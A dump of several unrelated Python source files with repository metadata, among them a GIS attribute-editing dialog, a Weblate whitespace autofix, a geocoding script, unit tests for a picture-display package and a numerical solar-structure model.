self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Выполнено удаление атрибутов пункта геодезической сети')
else:
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка удаления атрибутов пункта геодезической сети')
def saveData(self):
if len(self.treeWidget.selectedItems()) == 1:
self.guidGeodesicBase = self.treeWidget.selectedItems()[0].data(3, 0)
self.idCurrentMsk = str(idCurrentMSK())
try:
x = float(self.lineEditOrdX.text())
except:
x = 0.0
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования X')
try:
y = float(self.lineEditOrdY.text())
except:
y = 0.0
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка преобразования Y')
listValues = []
listValues.append(self.guidGeodesicBase)
listValues.append(self.idCurrentMsk)
listValues.append(self.lineEditPName.text())
listValues.append(self.lineEditPKind.text())
listValues.append(self.lineEditPKlass.text())
listValues.append(x)
listValues.append(y)
if updateFeature('pb_geo_osnova', self.guidGeodesicBase,
attributesNamesGeodesicBase, listValues):
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Выполнено обновление атрибутов пункта геодезической сети')
else:
self.labelMessage.setText(datetime.now().strftime('%H:%M:%S') + u' Ошибка обновления атрибутов пункта геодезической сети')
self.fillTree()
self.pushButtonAdd.setEnabled(True)
self.pushButtonEdit.setEnabled(True)
self.pushButtonSave.setEnabled(False)
self.pushButtonDel.setEnabled(True)
def refreshData(self):
self.pushButtonAdd.setEnabled(True)
self.pushButtonEdit.setEnabled(True)
self.pushButtonSave.setEnabled(False)
self.pushButtonDel.setEnabled(True)
self.fillTree()
self.fillLinesEdit()
def closeDialog(self):
self.guidGeodesicBase = None
self.close()
# QMessageBox.information(self.iface.mainWindow(), 'test', str())
|
UTF-8
|
Python
| false | false | 2,014 |
10,849,087,403,073 |
139e902cd66dc08845b2f858fb62aa5bb2690fcd
|
216436ec15b0c861d0a077e7e1b04b95eacfe3e5
|
/weblate/trans/autofixes/whitespace.py
|
f5c07bbd2121de3856b56b340f9a3858cb3446c1
|
[
"GPL-3.0-only",
"GPL-3.0-or-later"
] |
non_permissive
|
ruleant/weblate
|
https://github.com/ruleant/weblate
|
f862b73d3a252b64861d941def781c06264cd06b
|
621bcaa6ee4715c6980466d85378974993ac9d1c
|
refs/heads/master
| 2020-04-05T01:41:55.950291 | 2014-07-02T10:59:10 | 2014-07-02T10:59:10 | 4,017,606 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2014 Michal Čihař <[email protected]>
#
# This file is part of Weblate <http://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import re
from django.utils.translation import ugettext_lazy as _
from weblate.trans.autofixes.base import AutoFix
class SameBookendingWhitespace(AutoFix):
'''
Help non-techy translators with their whitespace
'''
name = _('Trailing and leading whitespace')
def fix_single_target(self, target, source, unit):
# normalize newlines of source
source = re.compile(r'\r\n|\r|\n').sub('\n', source)
# capture preceding and tailing whitespace
start = re.compile(r'^(\s+)').search(source)
end = re.compile(r'(\s+)$').search(source)
head = start.group() if start else ''
tail = end.group() if end else ''
# add the whitespace around the target translation (ignore blanks)
stripped = target.strip()
if stripped:
newtarget = '%s%s%s' % (head, stripped, tail)
return newtarget, newtarget != target
return target, False
|
UTF-8
|
Python
| false | false | 2,014 |
19,121,194,425,950 |
e3fd8c9532086117149ae94d088ee830d012c50d
|
3192c7a6902dd45759a3cf440d8c986404935a9a
|
/polling_locations.py
|
8c44e555b65e3a8a27e9e556b7433016c5b13c79
|
[] |
no_license
|
seshness/tweets-of-voter-shame
|
https://github.com/seshness/tweets-of-voter-shame
|
a03133cbb1c82f0ecc1e76cba3892571a1287331
|
0475eccca8b6d44797a5a64393f26de07458b870
|
refs/heads/master
| 2021-01-22T22:49:50.281235 | 2012-11-07T16:18:27 | 2012-11-07T16:18:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import requests
import fileinput
import json
from secrets import YAHOO_APP_ID
def make_url(location):
return 'http://where.yahooapis.com/geocode?q={0}&appid=' + YAHOO_APP_ID + '&flags=J'.format(location)
for line in fileinput.input():
r = requests.get(make_url(line))
data = json.loads(r.text)
first_result = data['ResultSet']['Results'][0]
print '{0},{1},{2}'.format(first_result['latitude'],
first_result['longitude'],
first_result['postal'])
|
UTF-8
|
Python
| false | false | 2,012 |
17,343,077,943,503 |
344da18b19886ab89f513d3537a6a53aa6424b84
|
0cab6615075e0ceaf1dcef3b906a824fc1380e01
|
/cpython/UnitTests/Test_mediawindows.py
|
b1c355f917f0a088c3b02b48357516fc560379eb
|
[] |
no_license
|
yuyutyrdinatry/pygraphics
|
https://github.com/yuyutyrdinatry/pygraphics
|
2c0a7fd6c6bc4cd68335eee09fec661aed5854d3
|
92396cb93a1019c5516c400925bbdef06c62174f
|
refs/heads/master
| 2016-09-14T13:23:38.467438 | 2011-10-11T23:55:36 | 2011-10-11T23:55:36 | 57,286,056 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""These are the tests for the mediawindows subpackage.
They test the production of graphical windows and so on. Some user interaction
may be required.
"""
# It may be worth looking into an automated GUI testing tool
# (like java.awt.Robot, but for CPython)
# These tests are often written in the style of vanilla unittest, because the
# style with nose used elsewhere in the test suite requires more typing.
import unittest
import subprocess
import sys
import os
import socket
import time
import media
import picture
import mediawindows as mw
from ampy import ampy as amp
def graphical_test(testcase):
if '--all' in sys.argv:
return testcase
graphical_test.__test__ = False
class RawInspectorTestCase(unittest.TestCase):
"""
Test the how the amp interface deals with closed windows behind the scenes
"""
def setUp(self):
# too lazy to do the setup code myself
pict = picture.Picture(1, 1)
self.image = pict.image
self.inspector_id = 0
def tearDown(self):
try:
self.stopInspect()
except mw.exceptions.MediaWindowsError:
pass
def startInspect(self):
res = mw.callRemote(mw.amp.StartInspect, img=self.image,
inspectable=True)
self.inspector_id = res['inspector_id']
return res
def stopInspect(self):
return mw.callRemote(mw.amp.StopInspect, inspector_id=self.inspector_id)
def updateInspect(self):
return mw.callRemote(mw.amp.UpdateInspect,
inspector_id=self.inspector_id,
img=self.image)
def pollInspect(self):
return mw.callRemote(mw.amp.PollInspect,
inspector_id=self.inspector_id)
def test_closeUnopenedRaises(self):
"""Closing an unopened window raises an exception"""
self.assertRaises(
self.stopInspect)
def test_closeUnopenedRaises(self):
"""Closing a closed window raises an exception"""
self.startInspect()
self.stopInspect()
self.assertRaises(
self.stopInspect)
def test_updateUnopenedRaises(self):
"""Updating an unopened window raises an exception"""
self.assertRaises(
self.updateInspect)
def test_updateUnopenedRaises(self):
"""Updating a closed window raises an exception"""
self.startInspect()
self.stopInspect()
self.assertRaises(
self.updateInspect)
def test_pollUnopenedIsClosed(self):
"""The window starts off closed."""
self.assertTrue(self.pollInspect()['is_closed'])
def test_pollClosedIsClosed(self):
"""The window polls as closed after it's closed."""
self.startInspect()
self.stopInspect()
self.assertTrue(self.pollInspect()['is_closed'])
def test_shownIsNotClosed(self):
"""The window is open after being shown."""
self.startInspect()
self.assertFalse(self.pollInspect()['is_closed'])
def test_show(self):
"""Showing assigns a nonzero inspector id"""
self.startInspect()
self.assertNotEqual(self.inspector_id, 0)
def test_showTwice(self):
"""The same image can be shown multiple times."""
self.startInspect()
id = self.inspector_id
self.startInspect()
self.assertNotEqual(self.inspector_id, id)
self.stopInspect()
self.inspector_id = id
def test_update(self):
"""Images can be updated
This doesn't test whether they actually are, just that nothing breaks
terribly.
"""
self.startInspect()
self.updateInspect()
def raisable(e):
if isinstance(e, type) and issubclass(e, TypeError):
return True
try:
raise e
except TypeError:
return False
except:
return True
raise RuntimeError("Impossible")
class InspectorTestCase(unittest.TestCase):
"""
Test the high level user of the proxied inspector through the Picture class
"""
# TODO: use a mocked API for this!
def setUp(self):
self.picture = picture.Picture(1, 1)
self.old_callRemote = mw.callRemote
mw.callRemote = self.mocked_callRemote
# tuples: (expected_cls, expected_kwargs return/raise value) ...
self.mock_actions = []
def tearDown(self):
mw.callRemote = self.old_callRemote
if self.mock_actions:
# this will be a test error, we probably don't really care...
# arguably it should be an error _and_ we should do the check
# in the test methods, but laziness trumps all
self.fail("mock actions were not all taken: %s" % self.mock_actions)
def mocked_callRemote(self, command, **kwargs):
if not self.mock_actions:
self.fail("Ran out of mock actions for callRemote(%s, **%s)" %
(command, kwargs))
(expected_Command, expected_kwargs, action) = self.mock_actions.pop(0)
self.assert_(issubclass(command, expected_Command))
self.assertEqual(expected_kwargs, kwargs)
if raisable(action):
raise action
else:
return action
def test_openCleanly(self):
"""Images assign their inspector_id when they open a new window."""
self.mock_actions = [
(mw.amp.StopInspect,
{"inspector_id": 0},
{}),
(mw.amp.StartInspect,
{"img": self.picture.image, "inspectable": False},
{"inspector_id": 1})]
self.picture.show()
self.assertEqual(self.picture.inspector_id, 1)
def test_openDirty(self):
"""
Images ignore errors when closing a window as part of opening a new
inspector window.
"""
self.mock_actions = [
(mw.amp.StopInspect,
{"inspector_id": 0},
mw.exceptions.WindowDoesNotExistError),
(mw.amp.StartInspect,
{"img": self.picture.image, "inspectable": False},
{"inspector_id": 1})]
self.picture.show()
self.assertEqual(self.picture.inspector_id, 1)
def test_closeCleanly(self):
"""Images forward close requests"""
self.mock_actions = [
(mw.amp.StopInspect,
{"inspector_id": 0},
{})]
self.picture.close()
def test_closeUnopened(self):
"""Images ignore errors when closing a window."""
self.mock_actions = [
(mw.amp.StopInspect,
{"inspector_id": 0},
mw.exceptions.WindowDoesNotExistError)]
self.picture.close()
def test_updateCleanly(self):
"""Images forward update requests"""
self.mock_actions = [
(mw.amp.UpdateInspect,
{"inspector_id": 0, "img": self.picture.image},
{})]
self.picture.update()
def test_updateDirty(self):
"""
Images turn update requests into show requests if there is no inspector
window running.
"""
self.mock_actions = [
(mw.amp.UpdateInspect,
{"inspector_id": 0, "img": self.picture.image},
mw.exceptions.WindowDoesNotExistError),
(mw.amp.StopInspect,
{"inspector_id": 0},
{}),
(mw.amp.StartInspect,
{"img": self.picture.image, "inspectable": False},
{"inspector_id": 1})]
self.picture.update()
def test_isClosedYes(self):
"""is_losed forwards the request"""
self.mock_actions = [
(mw.amp.PollInspect,
{"inspector_id": 0},
{"is_closed": True})]
self.assertTrue(self.picture.is_closed())
def test_isClosedNo(self):
"""is_losed forwards the request"""
self.mock_actions = [
(mw.amp.PollInspect,
{"inspector_id": 0},
{"is_closed": False})]
self.assertFalse(self.picture.is_closed())
class AsymmetricalPictureTestCase(unittest.TestCase):
"""Sometimes, silly bugs happen.
Uses a picture of size (2, 1)"""
def setUp(self):
self.picture = picture.Picture(2, 1)
def tearDown(self):
self.picture.close()
def testShow(self):
self.picture.show()
def testUpdate(self):
self.picture.show()
self.picture.update()
class OtherAsymmetricalPictureTestCase(AsymmetricalPictureTestCase):
"""Uses picture of size (1, 2)"""
def setUp(self):
self.picture = picture.Picture(1, 2)
class LargePictureTestCase(unittest.TestCase):
def setUp(self):
self.picture = picture.Picture(1000, 1000)
def tearDown(self):
self.picture.close()
def test_pictureIsTooLarge(self):
"""If this fails, none of the other tests in this suite make sense.
The picture's PIL tostring should have a length not representable
in two bytes, making it imcompatible with amp as a single value.
"""
self.assertTrue(len(self.picture.image.tostring()) > 0xFFFF)
def test_showLargePicture(self):
"""
AMP only permits up to 64 kilobyte values. Pictures can be larger than
that. To compensate, we use the BigString recipe from the amp wiki.
This test ensures that it's being used correctly.
"""
self.picture.show()
class OutdatedInspectorHandleTestCase(unittest.TestCase):
"""
Sometimes an inspector can be updated by someone else. e.g. the user
can close the window, despite .close() never being called.
These tests simulate that, and check that the right things happen.
We should never rely on a local understanding of what the current state
is.
"""
def setUp(self):
self.picture = picture.Picture(1, 1)
self.picture.show()
outdated_inspector_id = self.picture.inspector_id
self.picture.close()
# oh no!
self.picture.inspector_id = outdated_inspector_id
def test_isOpen(self):
self.assertTrue(self.picture.is_closed())
def test_update(self):
# should reopen
self.picture.update()
self.assertFalse(self.picture.is_closed())
self.picture.close()
def test_update(self):
# should open new window
self.picture.show()
self.assertFalse(self.picture.is_closed())
self.picture.close()
class MultipleAmpClientsTestCase(unittest.TestCase):
"""
Because servers aren't safe for multiple clients (they might block at the
whim of the client, etc.), they shouldn't accept multiple clients. This
test case tests that.
"""
def setUp(self):
self.proxy = amp.Proxy('127.0.0.1', mw.amp.PORT, socketTimeout=None)
def test_cantConnect(self):
self.assertRaises(socket.error, self.proxy.connect)
def _print_loud(msg):
underscores = "#" * min(len(msg), 80)
print
print underscores
print msg
print underscores
@graphical_test
class MultipleAmpServersTestCase(unittest.TestCase):
"""
Because Windows doesn't have sensible support for anonymous pipes,
a socket is used for communicating between processes. Sockets use ports
from a global namespace, there can only be up to 65535 (0xffff) ports
in use at any time, and the same port can't be used by independent
processes.
What this means is that if two processes import media, they need to both
start a mediawindows process each, but they can't use the same process*.
These tests confirm that they each create different processes and
(presumably) work.
[*] Note: it was mentioned that they can't use the same process. That isn't
obvious, however. Perhaps they could cooperate and use the same process?
Here are the reasons why that would be a bad idea:
- **The processes are created as *sub*processes.** Unfortunately, due to
the Windows OS lacking a daemonization mechanism (double-fork), the
lifetime of a subprocess is inextricably linked to the lifetime of a
process. So if they share a server, if the host dies, the other process
loses all its open windows and has to start a new server.
- **Some calls on the server might block.** In particular, the ask* dialogs
are most likely blocking calls that will lock up the server entirely.
It just can't be used by multiple clients.
"""
def setUp(self):
self.proc = subprocess.Popen([sys.executable, "-c",
"""if 1:
import media, picture
x = picture.Picture(1, 1)
x.show()
print x.inspector_id
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_print_loud("Please close the window to proceed with the tests.")
self.stdout, self.stderr = self.proc.communicate()
def test_canShowPictureWithoutCrashing(self):
try:
# succeeds past the print, no extra data
int(self.stdout)
except ValueError:
self.fail("stdout had non-int: %r" % (self.stdout,))
# no error messages
self.assertEqual(self.stderr, '')
# exited with status 0
self.assertEqual(self.proc.returncode, 0)
def test_doesntUseOurServer(self):
"""
It's possible that the subprocess's server crashes because the port is
taken, but the client succeeds in connecting to our server in the
current process. Let's check that this isn't true.
"""
x = picture.Picture(1, 1)
# ewww !
x.inspector_id = int(self.stdout)
self.assertTrue(x.is_closed())
@graphical_test
class AmpAskTestCase(unittest.TestCase):
"""Tests for user interaction with Ask* Commands
Because of the nature of these tests, they require user input. They are not
automated, and can only be run directly. Run this test file with "--all"
to include AmpAskTestCase.
In the future it may be desirable to automate these tests.
"""
# because, seriously, if we don't automate them, nobody will eeeeever run
# them. ~Devin
def setUp(self):
self.workdir = os.path.abspath(os.path.dirname(__file__))
def test_askCancel(self):
_print_loud("Please press Cancel.")
self.assertRaises(mw.exceptions.DialogCanceledException,
mw.callRemote,
mw.amp.AskDirectory,
initialdir=self.workdir)
def test_askInitialDir(self):
_print_loud("Please press OK")
self.assertEqual(
mw.callRemote(mw.amp.AskDirectory, initialdir=self.workdir)['path'],
self.workdir)
def test_askInitialDir2(self):
_print_loud("Please press OK")
self.assertEqual(
mw.callRemote(mw.amp.AskDirectory, initialdir='/')['path'],
'/')
@graphical_test
class AmpAskColorTestCase(unittest.TestCase):
"""Tests for user interaction with AskColor Command
Because of the nature of these tests, they require user input. They are not
automated, and can only be run directly. Run this test file with "--all"
to include AmpAskColorTestCase.
"""
c123 = {'r': 1, 'g': 2, 'b': 3}
def test_askCanceled(self):
_print_loud("Please press Cancel.")
self.assertRaises(mw.exceptions.DialogCanceledException,
mw.callRemote,
mw.amp.AskColor,
**self.c123)
def test_askOk(self):
_print_loud("Please press OK.")
self.assertEqual(
mw.callRemote(mw.amp.AskColor, **self.c123),
self.c123)
def test_askModify(self):
_print_loud("Please increase each color value by 1.")
self.assertEqual(
mw.callRemote(mw.amp.AskColor, **self.c123),
dict((k, v+1) for k, v in self.c123.iteritems()))
@graphical_test
class AmpSayTestCase(unittest.TestCase):
def test_Say(self):
_print_loud("Please enter in the contents of the following window")
text = "K"
mw.callRemote(mw.amp.Say, text="K")
self.assertEqual(raw_input('> '), text)
if '--all' in sys.argv:
sys.argv.remove('--all')
else:
pass # relevant test cases have already been deleted.
class ProcessClosesCleanlyTestCase(unittest.TestCase):
"""
While programs like 'import media; media.show(...)' shouldn't close until
all the windows are closed, programs that don't open windows should close
right away. This tests that.
"""
def test_closesAfterOneSecond(self):
proc = subprocess.Popen([sys.executable, '-c', 'import media'])
time.sleep(1)
if proc.poll() is None:
self.fail("python -c 'import media' did not close in 1 second")
if __name__ == '__main__':
unittest.main()
|
UTF-8
|
Python
| false | false | 2,011 |
18,030,272,725,841 |
e682873b7fbaf60042eb24bb477909f0d7ac5bb7
|
8cc275af5c153ca81a3ef8250ddf8435c5ca0b08
|
/solar_model.py
|
f2a91b4fb5eced9b66e186e4d1b7bc8414a72516
|
[] |
no_license
|
PaulMag/AST3310_project1
|
https://github.com/PaulMag/AST3310_project1
|
1d90de2e5df23b27a948360658e67ee4ad44e9f9
|
53dc03178caea549b8e41791916cabdbc7f249c0
|
refs/heads/master
| 2020-12-24T15:41:27.219302 | 2014-05-19T22:15:07 | 2014-05-19T22:15:07 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Package imports:
import os
import numpy as np
import sys
import matplotlib.pyplot as plt
# Physical constants:
c = 2.998e8 # [m/s]
sigma = 5.67e-8 # [W/m**2/K**4]
a = 4 * sigma / c # [J/m**3/K**4] # constant needed to calculate T_rad
u = 1.660538921e-27 # [kg] # atomic mass unit
k = 1.3806488e-23 # [J/K]
G = 6.67384e-11 # [m**3/kg/s**2]
MeV = 1.602176565e-13 # [J]
avogadro_inverse = 1 / 6.0221413e23 # the inverse of Avogadros number
# Ratios of different particles for star:
X = 0.7 # hydrogen
Y_3 = 1e-10 # helium3
Y = 0.29 # helium (total)
Z = 0.01 # all metals
Z_7Li = 1e-13 # lithium7
Z_7Be = 1e-13 # beryllium7
mu = 1. / (2*X + 3*Y/4. + Z/2.) # average particle mass in atomic mass units
# Convection parameters:
nabla_ad = 2. / 5 # adiabatic temperature gradient for ideal gas
alpha = 1. # mixing length
delta = 1. # ideal gases
c_P = 5/2. * k / (mu * u) # heat capacity for constant pressure
# Initial physical parameters for star:
try:
R0 = float(sys.argv[1]) # Usage: Give R0 as multiple of R_sun.
except:
R0 = 1 # R_sun is default
R0 *= 6.96e8 # [m] # x * R_sun
L0 = 1.0 * 3.846e26 # [w] # x * L_sun
M0 = 1.0 * 1.989e30 # [kg] # x * M_sun
T0 = 5770 # [K] # T_eff_sun
rho0 = 4.0e-4 # [kg/m**3]
P_rad0 = a / 3. * T0**4 # [Pa]
P_gas0 = rho0 * k * T0 / (mu * u) # [Pa] # equation of state
P0 = P_gas0 + P_rad0 # [Pa]
# Q's:
# How much energy each of the reaction give to the star when they happen.
Q_p_p = 1.177 * MeV
Q_d_p = 5.494 * MeV
Q_He3_He3 = 12.860 * MeV
Q_He3_He4 = 1.586 * MeV
Q_Be7_e = 0.049 * MeV
Q_Li7_p = 17.346 * MeV
Q_Be7_p = 0.137 * MeV
Q_B8 = 8.367 * MeV
Q_Be8 = 2.995 * MeV
# Names which are easier to remember:
# the numbers after Q_ tells which PP chains uses this Q value
Q_123 = Q_p_p + Q_d_p # proton-deuterium reaction happens immediately when deuterium available
Q_1 = Q_He3_He3
Q_23 = Q_He3_He4
Q_2a = Q_Be7_e
Q_2b = Q_Li7_p
Q_3 = Q_Be7_p + Q_B8 + Q_Be8 # no reaction rates for Q_B8 and Q_Be8 available
# Read opacity file:
infile = open("opacity.txt", "r")
logR_list = infile.readline() # list of the R's
logR_list = logR_list.split()[1:] # remove the word to the left
infile.readline() # skip empty line
logT_list = []
kappa_table = []
for line in infile: # read rest of file line by line
line = line.split() # divide the numbers into a list
logT_list.append(line.pop(0)) # place the first numer into the list of T's
kappa_table.append(line) # add the rest to a nested list of kappa values
infile.close()
logT_list, logR_list, kappa_table = np.array(logT_list), np.array(logR_list), np.array(kappa_table)
logT_list = logT_list.astype(float)
logR_list = logR_list.astype(float)
kappa_table = kappa_table.astype(float)
kappa_x = len(logR_list)
kappa_y = len(logT_list)
# Make placeholders for variables:
L = L0
R = R0
T = T0
P = P0
M = M0
rho = rho0
P_rad = P_rad0
P_gas = P_gas0
# Particle list:
class Particle:
# class for storing simple information about each particle type
def __init__(s, mass, ratio):
# particle mass, particle ratio, relative particle density
# n = rho_rel * rho
# rho_rel = n / rho
if mass > 0.5:
mass *= u # assume mass was given in [u] and convert to [kg]
s.mass = mass # particle mass
s.ratio = ratio # total mass ratio
s.rho_rel = ratio / mass
H = Particle(1.6738e-27, X)
He3 = Particle(5.0081e-27, Y_3)
He4 = Particle(6.6464e-27, Y - Y_3)
Li7 = Particle(7.01600455, Z_7Li)
Be7 = Particle(7.01692983, Z_7Be)
# Make the electron and set relative particle density to n_e = n_H + 2 * n_He:
e_ = Particle(9.10938291e-31, 0)
e_.rho_rel = H.rho_rel + 2 * He3.rho_rel + 2 * He4.rho_rel
# Functions:
def lam(i, j, T):
# Takes two particle types and temperature as argument.
# Checks what type of particles was given and picks the correct version of lambda.
# Dividing my Avogadros number happens outside the function, in the loop.
T = T / 1e9
# PP I & II & III:
if i == H and j == H:
s = 4.01e-15 * T**(-2/3.) * np.exp(- 3.380 * T**(-1/3.)) \
* ( 1 + 0.123 * T**(1/3.) + 1.09 * T**(2/3.) + 0.938 * T )
# PP I:
if i == He3 and j == He3:
s = 6.04e10 * T**(-2/3.) * np.exp(- 12.276 * T**(-1/3.)) \
* ( 1 + 0.034 * T**(1/3.) - 0.522 * T**(2/3.) - 0.124 * T \
+ 0.353 * T**(4/3.) + 0.213 * T**(-5/3.) )
# PP II & III:
if (i == He3 and j == He4) or (i == He4 and j == He3):
T_star = T / (1 + 4.95e-2 * T)
s = 5.61e6 * T_star**(5/6.) * T**(-3/2.) \
* np.exp(- 12.826 * T_star**(-1/3.))
# PP II:
if (i == Be7 and j == e_) or (i == e_ and j == Be7):
if T * 1e3 < 1: # T < 1e6
s = 1.57e-7 / (e_.rho_rel * rho)
else:
s = 1.34e-10 * T**(-1/2.) * (1 - 0.537 * T**(1/3.) + 3.86 * T**(2/3.)
+ 0.0027 * T**(-1) * np.exp(2.515e-3 * T**(-1)))
if (i == Li7 and j == H) or (i == H and j == Li7):
T_star = T / (1 + 0.759 * T)
s = 1.096e9 * T**(-2/3.) * np.exp(- 8.472 * T**(-1/3.)) \
- 4.830e8 * T_star**(5/6.) * T**(-2/3.) \
* np.exp(- 8.472 * T_star**(-1/3.)) \
+ 1.06e10 * T**(-3/2.) * np.exp(- 30.442 * T**(-1))
# PP III:
if (i == Be7 and j == H) or (i == H and j == Be7):
s = 3.11e5 * T**(-2/3.) * np.exp(- 10.262 * T**(-1/3.)) \
+ 2.53e3 * T**(-3/2.) * np.exp(- 7.306 * T**(-1))
#print "LAMBDA = ", s * avogadro_inverse * 1e-6 # for debugging
return s * 1e-6 # convert to [m**3/s]
def rate(i, j, rho, T):
# gives number of reactions per kg
if i == j: # two particles of same kind
delta = 1
else: # different particles
delta = 0
# n_j * n_i / (rho * (1 + delta)) * lambda_ij:
return i.rho_rel * j.rho_rel * rho / (1. + delta) * lam(i, j, T)
def kappa(T, rho):
# Method for finding the correct kappa from the table.
logT = np.log10(T)
rho = rho * 0.001 # convert to [g/cm**3]
logR = np.log10(rho / T * 1e-6)
# Find the temperature index:
i = 0 # this will be the vertical index in kappa_table
for logT_l in logT_list: # loop through temperatures from small to big
if logT_l > logT: # stop when a temp is found which is larger than T
if i > 0:
if logT - logT_list[i-1] < logT_l - logT: # check if the previous temp from the list was closer
i -= 1 # if so, take one step back
break # no need to check the rest
i += 1 # increase index counter and repeat (check next)
# Do the same to find the R index:
j = 0 # this will be the horizontal index in kappa_table
for logR_l in logR_list:
if logR_l > logR:
if j > 0:
if logR - logR_list[j-1] < logR_l - logR:
j -= 1
break
j += 1
# If T or rho is so large that they are off the table, print a warning and
# take one step back to avoid IndexOutOfBoundsError:
if i >= kappa_y:
i = kappa_y - 1
#print "Warning: T may have blown the kappa table."
if j >= kappa_x:
j = kappa_x - 1
#print "Warning: rho may have blown the kappa table."
kappa = 10**kappa_table[i,j] # find value in table and convert back from log
return kappa * 1000 # convert to [kg/m**3]
def flux_tot():
return L / (4 * np.pi * R*R)
def flux_rad():
if convection:
return 0.75 * a * c * G * T*T*T*T * M / (kap * P * R*R) * nabla
else:
return flux_tot()
def flux_con():
"""
Always call flux_rad() first, then flux_con().
"""
if convection:
return flux_tot() - F_rad
else:
return 0.
def print_to_screen():
"""
Writes the current result to screen for overseeing progress and debugging.
"""
print
print "resolution =", resolution
print "diff_largest =", diff_largest
print "dm =", dm
print "M =", M / M0, "M0"
print "rho =", rho / rho0, "rho0"
print "R =", R / R0, "R0"
print "P =", P / P0, "P0"
print "P_r =", P_rad / P0, "P0"
print "P_g =", P_gas / P0, "P0"
print "L =", L / L0, "L0"
print "T =", T / T0, "T0"
print "eps =", eps
print "kap =", kap
print "F_r =", F_rad
print "F_c =", F_con
print "PP_123 =", eprod_123
print "PP_1 =", eprod_1
print "PP_2 =", eprod_2
print "PP_3 =", eprod_3
print "PP_23 =", eprod_23
def print_to_file():
"""
Writes the current result to file for later plotting.
"""
outfile.write("%g %g %g %g %g %g %g %g %g %g %g %g %g %g %g %g\n" \
% (dm, M, rho, R, P, L, T, eps, kap, F_rad, F_con, \
eprod_123, eprod_1, eprod_2, eprod_3, eprod_23))
# Data output:
if len(sys.argv) < 3: # if no output name given
sys.argv.append("test") # default name
print "Outfile 'data2/test.dat' was made."
if len(sys.argv) < 4: # if no info given
sys.argv.append("") # set empty string
# Output file for results cmd-line-arg as filename:
outfile = open("data2/" + sys.argv[2] + ".dat", "w")
# If desirable, write information about current run on first line:
outfile.write(sys.argv[3] + "\n")
# Numerical parameters:
resolution = 0 # how often to show progress and write to file
# initial value 0 so that printout happens on first iteration
i = 0
def get_resolution():
"""
Assume it is sufficient to print out data when something has changed with
10 %.
"""
diff_largest = max( abs(dR/R), abs(dP/P), abs(dL/L), abs(dT/T) )
res = np.log(1.1) / np.log(1 + diff_largest)
if res > 5 * resolution: # avoids too sudden increases in the beginning
res = 5 * resolution + 1 # +1 in case resolution was 0
if res > 10000: # Set a maximum cap on the printout intervals.
return 10000
else:
return int(res)
dm_min = - 1e10
dm_max = - 1e26
dm = - 1e15 # initial dm, will be changed dynamically
diff_min = 0.0005 # declare interval to contain the rate of parameter change within
diff_max = 0.001
diff_largest = 0 # declaration only, will be updated
# Integration loop:
while True:
# Parameters that can be found instantaneously:
P_rad = a / 3. * T**4
P_gas = P - P_rad
rho = P_gas * mu * u / (k * T)
# The sum of the reaction rates times the energy they produce:
eprod_123 = rate(H , H, rho, T) * Q_123 # Energy production per mass
eprod_1 = rate(He3, He3, rho, T) * Q_1 # for each of the PP-chains.
eprod_2 = rate(Be7, e_, rho, T) * Q_2a + rate(Li7, H, rho, T) * Q_2b
eprod_3 = rate(Be7, H, rho, T) * Q_3
eprod_23 = rate(He3, He4, rho, T) * Q_23
eps = eprod_123 + eprod_1 + eprod_2 + eprod_3 + eprod_23
eps *= avogadro_inverse # does this here to avoid doing it several times
kap = kappa(T, rho) # find opacity
# Differential equations solved with Forward Euler:
dR = 1. / (4. * np.pi * R*R * rho) * dm;
dP = - G * M / (4. * np.pi * R*R*R*R) * dm
dL = eps * dm
# dT not determined before convection check is done
# Check for convection:
nabla_rad = 3. * kap * L * P / \
( 64. * np.pi * sigma * T*T*T*T * G * M )
#nabla_rad = (np.log(T - np.log(T)) / (np.log(P - np.log(P))
# alternative?
if nabla_rad > nabla_ad: # convective unstable => convection happens
convection = True
else: # convective stable => no convection
convection = False
if convection:
g = G * M / (R*R) # gravity acceleration
H_P = P / (g * rho) # pressure scale height
# TODO: H_P different for ideal gas?
U = 64 * sigma * T*T*T / (3 * kap * rho*rho * c_P) \
* (H_P * g * delta)**0.5 # internal energy
l_m = alpha * H_P # mixing length
RR = U / (l_m*l_m) # named RR to distinguish from radius R
K = 4 * RR
xi = np.roots([1./RR, 1, K, nabla_ad-nabla_rad]) # 2 complex and 1 real
xi = float( np.real( xi[np.imag(xi) == np.min(np.abs(np.imag(xi)))] ) )
# keeps the real root only
nabla = xi*xi + K * xi + nabla_ad
dT = nabla * T / P * dP
else:
dT = - 3 * kap * L \
/ ( 256. * np.pi*np.pi * sigma \
* R*R*R*R * T*T*T ) * dm
# Sometimes print out current progress in terminal and outfile:
if i >= resolution:
# Find fluxes :
# (these are not used in calculations, so only happens here)
F_rad = flux_rad()
F_con = flux_con()
print_to_screen()
print_to_file()
i = 0
resolution = get_resolution()
i += 1
# Update parameters for next iteration:
R += dR
P += dP
L += dL
T += dT
M += dm
# Check if anything dropped below zero:
# If this happens the system will stop making physical sense,
# so the simulation should be stopped.
# When it happens, print and save the last values of all parameters.
if rho <= 0 or R <= 0 or P <= 0 or L <= 0 or P_rad <= 0 \
or P_gas <= 0 or T <= 0 or M <= 0:
F_rad = flux_rad()
F_con = flux_con()
print_to_screen()
print_to_file()
break
# Dynamic mass step update:
diff_largest = max( abs(dR/R), abs(dP/P), abs(dL/L), abs(dT/T) )
if diff_largest > diff_max:
if dm < dm_min: # comparison is "reverse" since dm is negative
dm *= 0.1 * (diff_max / diff_largest)
elif diff_largest < diff_min:
if dm > dm_max:
